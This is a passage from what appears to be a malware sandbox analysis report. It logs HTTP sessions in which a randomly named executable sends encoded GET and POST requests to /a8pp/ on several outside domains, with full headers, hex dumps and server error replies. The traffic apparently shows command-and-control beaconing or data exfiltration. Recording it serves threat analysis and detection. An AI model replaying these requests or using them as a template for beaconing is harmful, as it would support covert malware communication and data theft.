                                        Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:35:35.443823099 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.11.3049810172.67.205.56807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:37.881932974 CEST475OUTGET /a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:35:38.109041929 CEST952INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:35:38 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7Tr21ZAxfEnu%2B6K4nO0XooYHmTtbKSngPWnwuLmkRRxt5ssWM4LEcbqopqIYN1YlW8qdcKKHUs6UMjLQZvmjxMfASWnRDWu1A502VmWpL63SRFHvfYjiubfZe7XkYYbAMJITPFV2C%2Bck9V1"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7f6c228a9453e-ATL
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:35:38.109055042 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.11.3049811162.0.237.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:43.508296967 CEST745OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4e 73 52 43 6c 61 76 67 77 31 31 66 68 6e 2b 45 39 4c 68 66 66 49 7a 35 54 6c 45 4c 66 61 52 30 68 56 4c 6f 30 2b 47 59 54 72 49 6d 50 70 56 43 65 72 44 47 70 2b 56 78 61 69 42 2b 38 47 65 6e 55 76 55 6a 69 73 39 53 75 34 70 66 4d 6b 43 4d 74 4d 6e 32 44 4e 31 74 48 69 2f 37 46 54 2f 35 4a 6a 4d 41 48 49 76 75 6e 63 2f 53 65 35 43 59 50 58 4c 41 52 4a 4d 38 65 36 2b 2f 63 71 64 68 66 56 70 6e 6a 62 43 35 59 68 37 39 31 67 52 45 38 2f 44 78 51 4e 55 65 6c 4b 6b 72 47 46 41 43 41 62 4e 31 66 47 6d 55 39 6d 37 71 35 56 65 32 65 48 55 43 6a 5a 51 38 4e 49 74 4f 52 75 55 64 2b 77 3d 3d
                                        Data Ascii: 2NlhHLS8=NsRClavgw11fhn+E9LhffIz5TlELfaR0hVLo0+GYTrImPpVCerDGp+VxaiB+8GenUvUjis9Su4pfMkCMtMn2DN1tHi/7FT/5JjMAHIvunc/Se5CYPXLARJM8e6+/cqdhfVpnjbC5Yh791gRE8/DxQNUelKkrGFACAbN1fGmU9m7q5Ve2eHUCjZQ8NItORuUd+w==
                                        Jun 4, 2024 14:35:43.701510906 CEST533INHTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:35:43 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.11.3049812162.0.237.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:46.209690094 CEST765OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4e 73 52 43 6c 61 76 67 77 31 31 66 68 47 75 45 37 59 4a 66 57 49 7a 2b 64 46 45 4c 49 4b 52 34 68 56 50 6f 30 38 71 49 54 64 34 6d 42 72 64 43 66 71 44 47 71 2b 56 78 53 43 42 2f 34 47 65 73 55 76 51 64 69 75 35 53 75 34 39 66 4d 6d 4b 4d 74 2f 50 31 43 64 31 6a 53 79 2f 44 42 54 2f 35 4a 6a 4d 41 48 49 72 58 6e 63 58 53 65 4b 71 59 4f 7a 65 57 62 70 4e 4f 57 61 2b 2f 59 71 64 6c 66 56 6f 77 6a 61 66 65 59 6a 7a 39 31 6b 64 45 38 71 76 77 5a 4e 55 69 71 71 6c 43 42 6c 68 73 45 59 4a 58 57 57 47 6b 7a 6a 48 74 31 69 76 73 44 45 67 41 77 35 73 52 52 4a 41 6d 54 73 56 47 6a 2f 79 4d 44 4f 70 4e 31 61 6c 50 2b 30 70 55 45 2b 78 57 75 36 38 3d
                                        Data Ascii: 2NlhHLS8=NsRClavgw11fhGuE7YJfWIz+dFELIKR4hVPo08qITd4mBrdCfqDGq+VxSCB/4GesUvQdiu5Su49fMmKMt/P1Cd1jSy/DBT/5JjMAHIrXncXSeKqYOzeWbpNOWa+/YqdlfVowjafeYjz91kdE8qvwZNUiqqlCBlhsEYJXWWGkzjHt1ivsDEgAw5sRRJAmTsVGj/yMDOpN1alP+0pUE+xWu68=
                                        Jun 4, 2024 14:35:46.388222933 CEST533INHTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:35:46 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.11.3049813162.0.237.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:48.923960924 CEST1682OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4e 73 52 43 6c 61 76 67 77 31 31 66 68 47 75 45 37 59 4a 66 57 49 7a 2b 64 46 45 4c 49 4b 52 34 68 56 50 6f 30 38 71 49 54 64 77 6d 42 65 52 43 5a 4a 72 47 72 2b 56 78 59 69 42 36 34 47 65 78 55 76 6f 52 69 75 31 43 75 37 46 66 4b 45 79 4d 6c 71 37 31 49 64 31 6a 4b 43 2f 34 46 54 2f 57 4a 67 6b 45 48 49 37 58 6e 63 58 53 65 4d 57 59 4c 58 4b 57 49 35 4d 38 65 36 2b 37 63 71 64 4e 66 56 77 67 6a 61 62 6b 59 54 54 39 31 41 78 45 39 59 33 77 62 74 55 61 6d 4b 6c 61 42 6c 74 76 45 5a 6c 54 57 57 7a 4c 7a 6b 7a 74 2f 6c 4f 6f 62 45 63 6b 6d 62 4d 66 61 4b 34 74 62 4e 42 50 39 74 4f 63 51 4d 70 49 37 65 68 56 35 77 38 4d 54 4b 4e 4c 76 76 52 76 6f 2f 68 30 38 6c 4a 61 54 2f 49 6a 76 4a 55 34 55 7a 48 7a 76 30 47 58 5a 35 53 37 59 58 2f 61 38 74 65 4e 65 4f 76 32 61 6b 59 4e 50 31 55 39 4a 6f 61 4b 55 33 45 66 6e 73 49 57 76 47 49 49 37 42 59 65 41 43 32 59 33 31 6b 42 35 39 39 6f 53 31 2b 30 52 6a 74 61 65 7a 57 46 59 46 39 67 32 34 76 72 33 50 37 41 43 2f 6a 39 51 71 56 55 6e [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=NsRClavgw11fhGuE7YJfWIz+dFELIKR4hVPo08qITdwmBeRCZJrGr+VxYiB64GexUvoRiu1Cu7FfKEyMlq71Id1jKC/4FT/WJgkEHI7XncXSeMWYLXKWI5M8e6+7cqdNfVwgjabkYTT91AxE9Y3wbtUamKlaBltvEZlTWWzLzkzt/lOobEckmbMfaK4tbNBP9tOcQMpI7ehV5w8MTKNLvvRvo/h08lJaT/IjvJU4UzHzv0GXZ5S7YX/a8teNeOv2akYNP1U9JoaKU3EfnsIWvGII7BYeAC2Y31kB599oS1+0RjtaezWFYF9g24vr3P7AC/j9QqVUnULw9BooSaP3u5Dy6FcS81iuly4CB6u0TiBSdzOEUieIhtkRGcF6EPtXweMr8pDe5cjiFtOHmlX3tOnaePE/+4Zzb+k10+5WUqBbvNWEVRnSF6Yp38c8O6DaL5dvY0gisQtsftuz8B4EB2+Od7RwAKERfJDTUWSGGayX9YvYsNUWM30IyEhj98iWYtuISphiznGewJUMcBc8LUOotD4U9KVMA3JNddJsHtQHqOFMrvkC3Jz9N2Ft2/uB9tuL/+KmSF8XY2Sakr3u3A5T538N+jD9HYLqATjE+VmXRbL04ld/ZnrRSHy9NDqEFjnobFD85UR58pn4hE25GZTgl770A7JIATeD9mCFvQa0vG7hpkQWw8TaCSCw5+HdJckhgdZHyWiLqhcmUKgO52Wjp3plJrGg5IzX6bpYGliGwyJr6/VfUo9+6AGhVjjjf34QLVji4dRBU52ZRnyuol/cfvjQp8EqE7NjO4a1c1M1FfmmFu93xLQdMUhNIFJGNi+L4hTnKLXTT1t7cu4eqLR21wsRwscR19Li+eGRkIleDsRtgJnwE1jn0QVXKLxQQ7BkL8E6iNcaKZVUTc2/hSGYSY/nEfxwehhxrHMXVV7EDNmdS2Cxy66TTLqXdRk/ChpY4OLqB6alaOsvjPJfZsd7eNKDL2xG5/J9E/2m35i [TRUNCATED]
                                        Jun 4, 2024 14:35:49.115365028 CEST533INHTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:35:49 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.11.3049814162.0.237.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:51.616478920 CEST470OUTGET /a8pp/?2NlhHLS8=Au5imsmV21JYiQqAtZZYW5jQMTc/TsZAtUnDsMKbX4YoEplVSL6Rm/9dTWFSyViTXIIw8p1ls4ghLUagt/HJKO94HieJHgrJIyAOML3UnsK6ear2OzXGe/M=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:35:51.793075085 CEST548INHTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:35:51 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.11.304981564.190.62.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:57.255354881 CEST751OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 57 34 56 51 38 67 75 44 4a 37 68 31 2b 5a 75 75 71 37 58 39 35 2b 65 42 59 6f 71 33 7a 2f 52 76 69 65 54 4f 43 39 35 6f 4b 34 59 4c 68 57 70 4b 64 4f 72 57 77 32 4c 4c 4d 48 51 5a 6c 47 37 45 46 36 47 58 33 30 33 43 45 65 75 35 30 2b 2f 52 54 47 35 6c 78 4f 53 4b 38 5a 73 4c 4f 75 5a 6f 57 47 4e 69 6c 42 43 6d 45 31 51 77 6a 2f 67 51 51 62 37 55 77 47 67 48 71 39 43 71 6c 2f 59 77 77 57 72 52 43 61 55 53 39 57 32 33 54 4b 76 54 51 6d 2b 54 43 42 38 43 34 43 45 6a 65 71 55 50 32 49 72 74 78 71 74 35 68 63 53 73 78 7a 51 57 33 46 36 62 4b 50 2f 31 73 65 4b 44 4f 56 2f 79 41 3d 3d
                                        Data Ascii: 2NlhHLS8=UW4VQ8guDJ7h1+Zuuq7X95+eBYoq3z/RvieTOC95oK4YLhWpKdOrWw2LLMHQZlG7EF6GX303CEeu50+/RTG5lxOSK8ZsLOuZoWGNilBCmE1Qwj/gQQb7UwGgHq9Cql/YwwWrRCaUS9W23TKvTQm+TCB8C4CEjeqUP2Irtxqt5hcSsxzQW3F6bKP/1seKDOV/yA==
                                        Jun 4, 2024 14:35:57.479831934 CEST701INHTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:35:57 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.11.304981664.190.62.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:00.013461113 CEST771OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
